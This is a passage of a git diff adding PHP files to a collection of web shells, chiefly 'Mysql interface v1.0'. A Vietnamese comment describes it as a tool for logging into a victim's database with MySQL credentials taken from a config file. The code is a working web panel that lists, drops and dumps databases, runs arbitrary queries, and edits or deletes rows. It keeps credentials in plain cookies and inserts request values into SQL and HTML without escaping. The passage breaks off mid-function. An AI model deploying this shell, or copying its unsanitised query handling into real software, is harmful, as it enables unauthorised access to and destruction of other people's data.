+	$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+	echo "-->";
+
+	if( $mysqlHandle == false ) {
+		echo "<html>\n";
+		echo "<head>\n";
+		echo "<title>MySQL Web Interface</title>\n";
+		echo "</head>\n";
+		echo "<body>\n";
+		echo "<table width=100% height=100%><tr><td><center>\n";
+		echo "<h1>Wrong Password!</h1>\n";
+		echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
+		echo "</center></td></tr></table>\n";
+		echo "</body>\n";
+		echo "</html>\n";
+	} else {
+		header_html();
+		if( $action == "listDBs" )
+			listDatabases();
+		else if( $action == "createDB" )
+			createDatabase();
+		else if( $action == "dropDB" )
+			dropDatabase();
+		else if( $action == "listTables" )
+			listTables();
+		else if( $action == "createTable" )
+			createTable();
+		else if( $action == "dropTable" )
+			dropTable();
+		else if( $action == "viewSchema" )
+			viewSchema();
+		else if( $action == "query" )
+			viewData( $queryStr );
+		else if( $action == "addField" )
+			manageField( "add" );
+		else if( $action == "addField_submit" )
+			manageField_submit( "add" );
+		else if( $action == "editField" )
+			manageField( "edit" );
+		else if( $action == "editField_submit" )
+			manageField_submit( "edit" );
+		else if( $action == "dropField" )
+			dropField();
+		else if( $action == "viewData" )
+			viewData( "" );
+		else if( $action == "addData" )
+			manageData( "add" );
+		else if( $action == "addData_submit" )
+			manageData_submit( "add" );
+		else if( $action == "editData" )
+			manageData( "edit" );
+		else if( $action == "editData_submit" )
+			manageData_submit( "edit" );
+		else if( $action == "deleteData" )
+			deleteData();
+		else if( $action == "utils" )
+			utils();
+
+		mysql_close( $mysqlHandle);
+		footer_html();
+	}
+}
+
+?>
diff --git a/xakep-shells/PHP/Mysql interface v1.0.php.txt b/xakep-shells/PHP/Mysql interface v1.0.php.txt
new file mode 100644
index 0000000..28a5e14
--- /dev/null
+++ b/xakep-shells/PHP/Mysql interface v1.0.php.txt	
@@ -0,0 +1,1166 @@
+<?
+/*
+* Mysql interface v1.0
+* -------------------------------
+* Description :
+* Dung` de login vao` CSDL cua victim khi da biet user va` pass cua mysql thong qua file config
+*/
+
+$HOSTNAME = "localhost";
+
+function logon() {
+global $PHP_SELF;
+
+setcookie( "mysql_web_admin_username" );
+setcookie( "mysql_web_admin_password" );
+echo "<html>\n";
+echo "<head>\n";
+echo "<title>Mysql interface</title>\n";
+echo "</head>\n";
+echo "<body>\n";
+echo "<table width=100% height=100%><tr><td><center>\n";
+echo "<table cellpadding=2><tr><td bgcolor=#0090FF><center>\n";
+echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
+echo "<h1><b><font color=#FF0000>Mysql Interface v1.0</font></b></h1>\n";
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=logon_submit>\n";
+echo "<table cellpadding=5 cellspacing=1>\n";
+echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
+echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";
+echo "</table><p>\n";
+echo "<input type=submit value='Enter'>\n";
+echo "<input type=reset value='Clear'><br>\n";
+echo "</form>\n";
+echo "</center></td></tr></table>\n";
+echo "</center></td></tr></table>\n";
+echo "<p><hr width=300>\n";
+echo "<font size=2>\n";
+echo "Copyright &copy; 2005\n <br>";
+echo "</font>\n";
+echo "</center></td></tr></table>\n";
+echo "</body>\n";
+echo "</html>\n";
+}
+
+function logon_submit() {
+global $username, $password, $PHP_SELF;
+
+setcookie( "mysql_web_admin_username", $username );
+setcookie( "mysql_web_admin_password", $password );
+echo "<html>";
+echo "<head>";
+echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=listDBs'>";
+echo "</head>";
+echo "</html>";
+}
+
+function echoQueryResult() {
+global $queryStr, $errMsg;
+
+if( $errMsg == "" ) $errMsg = "Success";
+if( $queryStr != "" ) {
+  echo "<table cellpadding=5>\n";
+  echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
+  echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
+  echo "</table><p>\n";
+}
+}
+
+function listDatabases() {
+global $mysqlHandle, $PHP_SELF;
+
+echo "<h1>Database List</h1>\n";
+
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=createDB>\n";
+echo "<input type=text name=dbname>\n";
+echo "<input type=submit value='Create Database'>\n";
+echo "</form>\n";
+echo "<hr>\n";
+
+echo "<table cellspacing=1 cellpadding=5>\n";
+
+$pDB = mysql_list_dbs( $mysqlHandle );
+$num = mysql_num_rows( $pDB );
+for( $i = 0; $i < $num; $i++ ) {
+  $dbname = mysql_dbname( $pDB, $i );
+  echo "<tr>\n";
+  echo "<td>$dbname</td>\n";
+  echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n";
+  echo "</tr>\n";
+}
+echo "</table>\n";
+}
+
+function createDatabase() {
+global $mysqlHandle, $dbname, $PHP_SELF;
+
+mysql_create_db( $dbname, $mysqlHandle );
+listDatabases();
+}
+
+function dropDatabase() {
+global $mysqlHandle, $dbname, $PHP_SELF;
+
+mysql_drop_db( $dbname, $mysqlHandle );
+listDatabases();
+}
+
+function listTables() {
+global $mysqlHandle, $dbname, $PHP_SELF;
+
+echo "<h1>Table List</h1>\n";
+echo "<p class=location>$dbname</p>\n";
+echoQueryResult();
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=createTable>\n";
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=text name=tablename>\n";
+echo "<input type=submit value='Create Table'>\n";
+echo "</form>\n";
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=query>\n";
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=text size=40 name=queryStr>\n";
+//echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>";
+echo "<input type=submit value='Query'>\n";
+echo "</form>\n";
+echo "<hr>\n";
+
+$pTable = mysql_list_tables( $dbname );
+
+if( $pTable == 0 ) {
+  $msg  = mysql_error();
+  echo "<h3>Error : $msg</h3><p>\n";
+  return;
+}
+$num = mysql_num_rows( $pTable );
+
+echo "<table cellspacing=1 cellpadding=5>\n";
+
+for( $i = 0; $i < $num; $i++ ) {
+  $tablename = mysql_tablename( $pTable, $i );
+
+  echo "<tr>\n";
+  echo "<td>\n";
+  echo "$tablename\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n";
+  echo "</td>\n";
+  echo "</tr>\n";
+}
+
+echo "</table>";
+}
+
+function createTable() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+$queryStr = "CREATE TABLE $tablename ( no INT )";
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+listTables();
+}
+
+function dropTable() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+$queryStr = "DROP TABLE $tablename";
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+listTables();
+}
+
+function viewSchema() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+echo "<h1>Table Schema</h1>\n";
+echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+echoQueryResult();
+
+echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
+echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
+echo "<hr>\n";
+
+$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+$num = mysql_num_rows( $pResult );
+
+echo "<table cellspacing=1 cellpadding=5>\n";
+echo "<tr>\n";
+echo "<th>Field</th>\n";
+echo "<th>Type</th>\n";
+echo "<th>Null</th>\n";
+echo "<th>Key</th>\n";
+echo "<th>Default</th>\n";
+echo "<th>Extra</th>\n";
+echo "<th colspan=2>Action</th>\n";
+echo "</tr>\n";
+
+for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_array( $pResult );
+  echo "<tr>\n";
+  echo "<td>".$field["Field"]."</td>\n";
+  echo "<td>".$field["Type"]."</td>\n";
+  echo "<td>".$field["Null"]."</td>\n";
+  echo "<td>".$field["Key"]."</td>\n";
+  echo "<td>".$field["Default"]."</td>\n";
+  echo "<td>".$field["Extra"]."</td>\n";
+  $fieldname = $field["Field"];
+  echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
+  echo "</tr>\n";
+}
+echo "</table>\n";
+}
+
+function manageField( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
+
+if( $cmd == "add" )
+  echo "<h1>Add Field</h1>\n";
+else if( $cmd == "edit" ) {
+  echo "<h1>Edit Field</h1>\n";
+  $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+  $num = mysql_num_rows( $pResult );
+  for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_array( $pResult );
+  if( $field["Field"] == $fieldname ) {
+    $fieldtype = $field["Type"];
+    $fieldkey = $field["Key"];
+    $fieldextra = $field["Extra"];
+    $fieldnull = $field["Null"];
+    $fielddefault = $field["Default"];
+    break;
+  }
+  }
+  $type = strtok( $fieldtype, " (,)\n" );
+  if( strpos( $fieldtype, "(" ) ) {
+  if( $type == "enum" | $type == "set" ) {
+    $valuelist = strtok( " ()\n" );
+  } else {
+    $M = strtok( " (,)\n" );
+    if( strpos( $fieldtype, "," ) )
+    $D = strtok( " (,)\n" );
+  }
+  }
+}
+
+echo "<p class=location>$dbname &gt; $tablename</p>\n";
+echo "<form action=$PHP_SELF>\n";
+
+if( $cmd == "add" )
+  echo "<input type=hidden name=action value=addField_submit>\n";
+else if( $cmd == "edit" ) {
+  echo "<input type=hidden name=action value=editField_submit>\n";
+  echo "<input type=hidden name=old_name value=$fieldname>\n";
+}
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=hidden name=tablename value=$tablename>\n";
+
+echo "<h3>Name</h3>\n";
+echo "<input type=text name=name value=$fieldname><p>\n";
+?>
+
+<h3>Type</h3>
+
+<font size=2>
+* `M' indicates the maximum display size.<br>
+* `D' applies to floating-point types and indicates the number of digits following the decimal point.<br>
+</font>
+
+<table>
+<tr>
+<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYINT" <? if( $type == "tinyint" ) echo "checked";?>>TINYINT (-128 ~ 127)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SMALLINT" <? if( $type == "smallint" ) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMINT" <? if( $type == "mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="INT" <? if( $type == "int" ) echo "checked";?>>INT (-2147483648 ~ 2147483647)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" ) echo "checked";?>>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) echo "checked";?>>FLOAT</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" ) echo "checked";?>>DOUBLE</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DECIMAL" <? if( $type == "decimal" ) echo "checked";?>>DECIMAL(NUMERIC)</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATE" <? if( $type == "date" ) echo "checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATETIME" <? if( $type == "datetime" ) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIMESTAMP" <? if( $type == "timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIME" <? if( $type == "time" ) echo "checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) echo "checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) echo "checked";?>>CHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="VARCHAR" <? if( $type == "varchar" ) echo "checked";?>>VARCHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYTEXT" <? if( $type == "tinytext" ) echo "checked";?>>TINYTEXT (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) echo "checked";?>>TEXT (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == "mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGTEXT" <? if( $type == "longtext" ) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYBLOB" <? if( $type == "tinyblob" ) echo "checked";?>>TINYBLOB (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) echo "checked";?>>BLOB (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == "mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGBLOB" <? if( $type == "longblob" ) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) echo "checked";?>>ENUM</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SET" <? if( $type == "set" ) echo "checked";?>>SET</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+
+</table>
+<table>
+<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: 'apple', 'orange', 'banana') </th></tr>
+<tr>
+<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo "value=$M";?>></td>
+<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo "value=$D";?>></td>
+<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? if( strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? if( strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=binary value="BINARY" <? if( strpos( $fieldtype, "binary" )  ) echo "checked";?>></td>
+<td align=center><input type=text size=60 name=valuelist <? if( $valuelist != "" ) echo "value=\"$valuelist\"";?>></td>
+</tr>
+</table>
+
+
+<h3>Flags</h3>
+<table>
+<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
+<tr>
+<td align=center><input type=checkbox name=not_null value="NOT NULL" <? if( $fieldnull != "YES" ) echo "checked";?>></td>
+<td align=center><input type=text name=default_value <? if( $fielddefault != "" ) echo "value=$fielddefault";?>></td>
+<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" <? if( $fieldkey == "PRI" ) echo "checked";?>></td>
+</tr>
+</table>
+
+<p>
+
+<?
+if( $cmd == "add" )
+  echo "<input type=submit value='Add Field'>\n";
+else if( $cmd == "edit" )
+  echo "<input type=submit value='Edit Field'>\n";
+echo "<input type=button value=Cancel onClick='history.back()'>\n";
+echo "</form>\n";
+}
+
+function manageField_submit( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
+  $M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;
+
+if( $cmd == "add" )
+  $queryStr = "ALTER TABLE $tablename ADD $name ";
+else if( $cmd == "edit" )
+  $queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
+
+if( $M != "" )
+  if( $D != "" )
+  $queryStr .= "$type($M,$D) ";
+  else
+  $queryStr .= "$type($M) ";
+else if( $valuelist != "" ) {
+  $valuelist = stripslashes( $valuelist );
+  $queryStr .= "$type($valuelist) ";
+} else
+  $queryStr .= "$type ";
+
+$queryStr .= "$unsigned $zerofill $binary ";
+
+if( $default_value != "" )
+  $queryStr .= "DEFAULT '$default_value' ";
+
+$queryStr .= "$not_null $auto_increment";
+
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+// key change
+$keyChange = false;
+$result = mysql_query( "SHOW KEYS FROM $tablename" );
+$primary = "";
+while( $row = mysql_fetch_array($result) )
+  if( $row["Key_name"] == "PRIMARY" ) {
+  if( $row[Column_name] == $name )
+    $keyChange = true;
+  else
+    $primary .= ", $row[Column_name]";
+  }
+if( $primary_key == "PRIMARY KEY" ) {
+  $primary .= ", $name";
+  $keyChange = !$keyChange;
+}
+$primary = substr( $primary, 2 );
+if( $keyChange == true ) {
+  $q = "ALTER TABLE $tablename DROP PRIMARY KEY";
+  mysql_query( $q );
+  $queryStr .= "<br>\n" . $q;
+  $errMsg .= "<br>\n" . mysql_error();
+  $q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
+  mysql_query( $q );
+  $queryStr .= "<br>\n" . $q;
+  $errMsg .= "<br>\n" . mysql_error();
+}
+
+viewSchema();
+}
+
+function dropField() {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr , $mysqlHandle );
+$errMsg = mysql_error();
+
+viewSchema();
+}
+
+function viewData( $queryStr ) {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;
+
+echo "<h1>Data in Table</h1>\n";
+if( $tablename != "" )
+  echo "<p class=location>$dbname &gt; $tablename</p>\n";
+else
+  echo "<p class=location>$dbname</p>\n";
+
+$queryStr = stripslashes( $queryStr );
+if( $queryStr == "" ) {
+  $queryStr = "SELECT * FROM $tablename";
+  if( $orderby != "" )
+  $queryStr .= " ORDER BY $orderby";
+  echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
+  echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+}
+
+$pResult = mysql_db_query( $dbname, $queryStr );
+$errMsg = mysql_error();
+
+$GLOBALS[queryStr] = $queryStr;
+
+if( $pResult == false ) {
+  echoQueryResult();
+  return;
+}
+if( $pResult == 1 ) {
+  $errMsg = "Success";
+  echoQueryResult();
+  return;
+}
+
+echo "<hr>\n";
+
+$row = mysql_num_rows( $pResult );
+$col = mysql_num_fields( $pResult );
+
+if( $row == 0 ) {
+  echo "No Data Exist!";
+  return;
+}
+
+if( $rowperpage == "" ) $rowperpage = 20;
+if( $page == "" ) $page = 0;
+else $page--;
+mysql_data_seek( $pResult, $page * $rowperpage );
+
+echo "<table cellspacing=1 cellpadding=2>\n";
+echo "<tr>\n";
+for( $i = 0; $i < $col; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  echo "<th>";
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
+  echo "</th>\n";
+}
+echo "<th colspan=2>Action</th>\n";
+echo "</tr>\n";
+
+for( $i = 0; $i < $rowperpage; $i++ ) {
+  $rowArray = mysql_fetch_row( $pResult );
+  if( $rowArray == false ) break;
+  echo "<tr>\n";
+  $key = "";
+  for( $j = 0; $j < $col; $j++ ) {
+  $data = $rowArray[$j];
+
+  $field = mysql_fetch_field( $pResult, $j );
+  if( $field->primary_key == 1 )
+    $key .= "&" . $field->name . "=" . $data;
+
+  if( strlen( $data ) > 20 )
+    $data = substr( $data, 0, 20 ) . "...";
+  $data = htmlspecialchars( $data );
+  echo "<td>\n";
+  echo "$data\n";
+  echo "</td>\n";
+  }
+
+  if( $key == "" )
+  echo "<td colspan=2>no Key</td>\n";
+  else {
+  echo "<td><a href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
+  }
+  echo "</tr>\n";
+}
+echo "</table>\n";
+
+echo "<font size=2>\n";
+echo "<form action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' method=post>\n";
+echo "<font color=green>\n";
+echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
+echo "</font>\n";
+echo " | ";
+if( $page > 0 ) {
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
+  if( $orderby != "" )
+  echo "&orderby=$orderby";
+  echo "'>Prev</a>\n";
+} else
+  echo "Prev";
+echo " | ";
+if( $page < ($row/$rowperpage)-1 ) {
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
+  if( $orderby != "" )
+  echo "&orderby=$orderby";
+  echo "'>Next</a>\n";
+} else
+  echo "Next";
+echo " | ";
+if( $row > $rowperpage ) {
+  echo "<input type=text size=4 name=page>\n";
+  echo "<input type=submit value='Go'>\n";
+}
+echo "</form>\n";
+echo "</font>\n";
+}
+
+function manageData( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
+
+if( $cmd == "add" )
+  echo "<h1>Add Data</h1>\n";
+else if( $cmd == "edit" ) {
+  echo "<h1>Edit Data</h1>\n";
+  $pResult = mysql_list_fields( $dbname, $tablename );
+  $num = mysql_num_fields( $pResult );
+
+  $key = "";
+  for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  if( $field->primary_key == 1 )
+    if( $field->numeric == 1 )
+    $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+    else
+    $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+  }
+  $key = substr( $key, 0, strlen($key)-4 );
+
+  mysql_select_db( $dbname, $mysqlHandle );
+  $pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
+  $data = mysql_fetch_array( $pResult );
+}
+
+echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+echo "<form action='$PHP_SELF' method=post>\n";
+if( $cmd == "add" )
+  echo "<input type=hidden name=action value=addData_submit>\n";
+else if( $cmd == "edit" )
+  echo "<input type=hidden name=action value=editData_submit>\n";
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=hidden name=tablename value=$tablename>\n";
+echo "<table cellspacing=1 cellpadding=2>\n";
+echo "<tr>\n";
+echo "<th>Name</th>\n";
+echo "<th>Type</th>\n";
+echo "<th>Function</th>\n";
+echo "<th>Data</th>\n";
+echo "</tr>\n";
+
+$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+$num = mysql_num_rows( $pResult );
+
+$pResultLen = mysql_list_fields( $dbname, $tablename );
+
+for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_array( $pResult );
+  $fieldname = $field["Field"];
+  $fieldtype = $field["Type"];
+  $len = mysql_field_len( $pResultLen, $i );
+
+  echo "<tr>";
+  echo "<td>$fieldname</td>";
+  echo "<td>".$field["Type"]."</td>";
+  echo "<td>\n";
+  echo "<select name=${fieldname}_function>\n";
+  echo "<option>\n";
+  echo "<option>ASCII\n";
+  echo "<option>CHAR\n";
+  echo "<option>SOUNDEX\n";
+  echo "<option>CURDATE\n";
+  echo "<option>CURTIME\n";
+  echo "<option>FROM_DAYS\n";
+  echo "<option>FROM_UNIXTIME\n";
+  echo "<option>NOW\n";
+  echo "<option>PASSWORD\n";
+  echo "<option>PERIOD_ADD\n";
+  echo "<option>PERIOD_DIFF\n";
+  echo "<option>TO_DAYS\n";
+  echo "<option>USER\n";
+  echo "<option>WEEKDAY\n";
+  echo "<option>RAND\n";
+  echo "</select>\n";
+  echo "</td>\n";
+  $value = htmlspecialchars($data[$i]);
+  if( $cmd == "add" ) {
+  $type = strtok( $fieldtype, " (,)\n" );
+  if( $type == "enum" || $type == "set" ) {
+    echo "<td>\n";
+    if( $type == "enum" )
+    echo "<select name=$fieldname>\n";
+    else if( $type == "set" )
+    echo "<select name=$fieldname size=4 multiple>\n";
+    echo strtok( "'" );
+    while( $str = strtok( "'" ) ) {
+    echo "<option>$str\n";
+    strtok( "'" );
+    }
+    echo "</select>\n";
+    echo "</td>\n";
+  } else {
+    if( $len < 40 )
+    echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
+    else
+    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
+  }
+  } else if( $cmd == "edit" ) {
+  $type = strtok( $fieldtype, " (,)\n" );
+  if( $type == "enum" || $type == "set" ) {
+    echo "<td>\n";
+    if( $type == "enum" )
